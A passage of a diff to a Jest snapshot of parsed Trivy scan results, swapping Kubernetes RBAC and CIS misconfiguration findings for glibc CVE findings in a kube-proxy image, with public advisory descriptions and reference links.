"HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:resourcequota-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33574", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", + "https://access.redhat.com/security/cve/CVE-2021-33574", + "https://linux.oracle.com/cve/CVE-2021-33574.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210629-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + "https://www.cve.org/CVERecord?id=CVE-2021-33574", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:resourcequota-controller", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "category": "Vulnerability", + "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: mq_notify does not handle separately allocated thread attributes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://avd.aquasec.com/nvd/cve-2021-33574", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2021-33574", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:replication-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:replication-controller", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://linux.oracle.com/cve/CVE-2021-33574.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:root-ca-cert-publisher' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:root-ca-cert-publisher", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(ClusterRole 'system:controller:root-ca-cert-publisher' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + }, { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security.netapp.com/advisory/ntap-20210629-0005/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33574", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-35942", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", + "https://access.redhat.com/security/cve/CVE-2021-35942", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", + "https://linux.oracle.com/cve/CVE-2021-35942.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", + "https://security.gentoo.org/glsa/202208-24", + "https://security.netapp.com/advisory/ntap-20210827-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", + "https://sourceware.org/glibc/wiki/Security%20Exceptions", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5699-1", + "https://www.cve.org/CVERecord?id=CVE-2021-35942", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", + "category": "Vulnerability", + "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: Arbitrary read in wordexp()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://avd.aquasec.com/nvd/cve-2021-35942", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://access.redhat.com/security/cve/CVE-2021-35942", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:kube-controller-manager' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://linux.oracle.com/cve/CVE-2021-35942.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:kube-controller-manager' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-scheduler' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-scheduler", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:kube-scheduler' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security.netapp.com/advisory/ntap-20210827-0005/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-scheduler' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-scheduler", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:kube-scheduler' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:node' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:node", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://sourceware.org/glibc/wiki/Security%20Exceptions", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRoleBinding/trivy-k8s' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV111", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv111", - ], - }, - "category": "Misconfiguration", - "description": "The RBAC role cluster-admin provides wide-ranging powers over the environment and should be used only where and when needed.", - "location": "scb://trivy/?Kind=ClusterRoleBinding&Name=trivy-k8s", - "mitigation": "Identify all clusterrolebindings to the cluster-admin role. Check if they are used and if they need this role or if they could use a role with fewer privileges.", - "name": "Ensure that the cluster-admin role is only used where required(ClusterRoleBinding 'trivy-k8s' with role 'cluster-admin' should be used only when required)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv111", + "value": "https://ubuntu.com/security/notices/USN-5699-1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-35942", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0056", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-23218", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0056", + "https://access.redhat.com/security/cve/CVE-2022-23218", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", + "https://linux.oracle.com/cve/CVE-2022-23218.html", + "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", + "https://security.gentoo.org/glsa/202208-24", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2022-23218", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, - "category": "Misconfiguration", - "description": "Ensure that the container network interface file has permissions of 600 or more restrictive.", - "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", - "mitigation": "Change the container network interface file path/to/cni/files permissions of 600 or more restrictive ", - "name": "Ensure that the container network interface file permissions are set to 600 or more restrictive(Ensure that the Container Network Interface specification file permissions is set to 600 or more restrictive)", + "category": "Vulnerability", + "description": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: Stack-based buffer overflow in svcunix_create via long pathnames", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0056", + "value": "https://avd.aquasec.com/nvd/cve-2022-23218", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/security/cve/CVE-2022-23218", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0059", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0059", - ], - }, - "category": "Misconfiguration", - "description": "Ensure that the etcd data directory ownership is set to etcd:etcd.", - "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", - "mitigation": "Change the etcd data directory /var/lib/etcd ownership to etcd:etcd", - "name": "Ensure that the etcd data directory ownership is set to etcd:etcd(Ensure that the etcd data directory ownership is set to etcd:etcd)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0059", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://linux.oracle.com/cve/CVE-2022-23218.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0068", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0068", - ], - }, - "category": "Misconfiguration", - "description": "Ensure that the Kubernetes PKI certificate file permission is set to 600.", - "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", - "mitigation": "Change the Kubernetes PKI certificate file /etc/kubernetes/pki/*.crt permission to 600", - "name": "Ensure that the Kubernetes PKI certificate file permission is set to 600(Ensure that the Kubernetes PKI certificate file permission is set to 600)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0068", + "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0069", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0069", - ], - }, - "category": "Misconfiguration", - "description": "Ensure that the kubelet service file has permissions of 600 or more restrictive.", - "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", - "mitigation": "Change the kubelet service file /etc/systemd/system/kubelet.service.d/10-kubeadm.conf permissions of 600 or more restrictive ", - "name": "Ensure that the kubelet service file permissions are set to 600 or more restrictive(Ensure that the kubelet service file permissions are set to 600 or more restrictive)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0069", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://security.gentoo.org/glsa/202208-24", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0075", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0075", - ], - }, - "category": "Misconfiguration", - "description": "Ensure that the certificate authorities file has permissions of 600 or more restrictive.", - "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", - "mitigation": "Change the certificate authorities file permissions to 600 or more restrictive if exist", - "name": "Ensure that the certificate authorities file permissions are set to 600 or more restrictive(Ensure that the certificate authorities file permissions are set to 600 or more restrictive)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0075", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0077", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0077", - ], - }, - "category": "Misconfiguration", - "description": "Ensure that if the kubelet refers to a configuration file with the --config argument, that file has permissions of 600 or more restrictive.", - "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", - "mitigation": "Change the kubelet config yaml permissions to 600 or more restrictive if exist", - "name": "If the kubelet config.yaml configuration file is being used validate permissions set to 600 or more restrictive(Ensure that if the kubelet refers to a configuration file with the --config argument, that file has permissions of 600 or more restrictive.)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0077", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-23218", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], "severity": "HIGH", }, -] -`; - -exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox itself 1`] = ` -[ { "attributes": { - "fixedVersion": "2.10.7-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-36159", - "installedVersion": "2.10.5-r1", - "packageName": "apk-tools", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-23219", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://github.com/freebsd/freebsd-src/commits/main/lib/libfetch", - "https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10749", - "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E", + "https://access.redhat.com/security/cve/CVE-2022-23219", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", + "https://linux.oracle.com/cve/CVE-2022-23219.html", + "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", + "https://security.gentoo.org/glsa/202208-24", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2022-23219", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "libfetch before 2021-07-26, as used in apk-tools, xbps, and other products, mishandles numeric strings for the FTP and HTTP protocols. The FTP passive mode implementation allows an out-of-bounds read because strtol is used to parse the relevant numbers into address bytes. It does not check if the line ends prematurely. If it does, the for-loop condition checks for the '\\0' terminator one byte too late.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "Finding in Dependency apk-tools (2.10.5-r1)", + "name": "glibc: Stack-based buffer overflow in sunrpc clnt_create via a long pathname", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36159", + "value": "https://avd.aquasec.com/nvd/cve-2022-23219", }, { "type": "URL", - "value": "https://github.com/freebsd/freebsd-src/commits/main/lib/libfetch", + "value": "https://access.redhat.com/security/cve/CVE-2022-23219", }, { "type": "URL", - "value": "https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10749", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E", + "value": "https://linux.oracle.com/cve/CVE-2022-23219.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E", + "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", }, { "type": "URL", - "value": 